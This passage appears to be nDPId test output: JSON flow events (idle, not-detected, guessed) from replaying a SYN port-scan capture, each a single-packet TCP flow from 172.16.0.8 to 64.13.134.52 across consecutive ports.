+00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":574,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059409,"flow_last_seen":1278275059409,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":9091,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1591,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060847,"flow_last_seen":1278275060847,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":900,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
+00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1591,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060847,"flow_last_seen":1278275060847,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":900,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":646,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059518,"flow_last_seen":1278275059518,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":9091,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":646,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059518,"flow_last_seen":1278275059518,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":9091,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1659,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060949,"flow_last_seen":1278275060949,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":900,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1659,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060949,"flow_last_seen":1278275060949,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":900,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00593{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":866,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059846,"flow_last_seen":1278275059846,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":901,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
+00578{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":866,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059846,"flow_last_seen":1278275059846,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":901,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1928,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061312,"flow_last_seen":1278275061312,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":4998,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1928,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061312,"flow_last_seen":1278275061312,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":4998,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1092,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060176,"flow_last_seen":1278275060176,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":902,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1092,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060176,"flow_last_seen":1278275060176,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":902,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00593{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":939,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059956,"flow_last_seen":1278275059956,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":901,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
+00578{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":939,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059956,"flow_last_seen":1278275059956,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":901,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1994,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061416,"flow_last_seen":1278275061416,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":4998,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1994,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061416,"flow_last_seen":1278275061416,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":4998,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00653{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1587,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060847,"flow_last_seen":1278275060847,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":903,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"VMware","breed":"Acceptable","category":"RemoteAccess"}} +00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1587,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060847,"flow_last_seen":1278275060847,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":903,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1163,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060286,"flow_last_seen":1278275060286,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":902,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
+00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1163,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060286,"flow_last_seen":1278275060286,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":902,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00653{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1663,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060949,"flow_last_seen":1278275060949,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":903,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"VMware","breed":"Acceptable","category":"RemoteAccess"}} +00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1663,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060949,"flow_last_seen":1278275060949,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":903,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1169,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060286,"flow_last_seen":1278275060286,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":5000,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1169,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060286,"flow_last_seen":1278275060286,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":5000,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1238,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060388,"flow_last_seen":1278275060388,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":5000,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
+00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1238,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060388,"flow_last_seen":1278275060388,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":5000,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00687{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":745,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1278275059632,"flow_last_seen":1278275059632,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":5001,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TargusDataspeed","breed":"Acceptable","category":"Network"}} +00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1929,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061312,"flow_last_seen":1278275061312,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":5002,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
+00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1929,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061312,"flow_last_seen":1278275061312,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":5002,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00687{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":810,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1278275059741,"flow_last_seen":1278275059741,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":5001,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TargusDataspeed","breed":"Acceptable","category":"Network"}} +00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1993,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061416,"flow_last_seen":1278275061416,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":5002,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
+00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1993,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061416,"flow_last_seen":1278275061416,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":5002,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1798,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061109,"flow_last_seen":1278275061109,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":5003,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1798,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061109,"flow_last_seen":1278275061109,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":5003,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1644,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060903,"flow_last_seen":1278275060903,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":9099,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1644,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060903,"flow_last_seen":1278275060903,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":9099,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1727,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061006,"flow_last_seen":1278275061006,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":9099,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
+00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1727,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061006,"flow_last_seen":1278275061006,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":9099,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1859,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061210,"flow_last_seen":1278275061210,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":5003,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1859,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061210,"flow_last_seen":1278275061210,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":5003,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1523,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060746,"flow_last_seen":1278275060746,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":9100,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1523,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060746,"flow_last_seen":1278275060746,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":9100,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1437,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060642,"flow_last_seen":1278275060642,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":5004,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
+00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1437,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060642,"flow_last_seen":1278275060642,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":5004,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1600,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060850,"flow_last_seen":1278275060850,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":9100,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 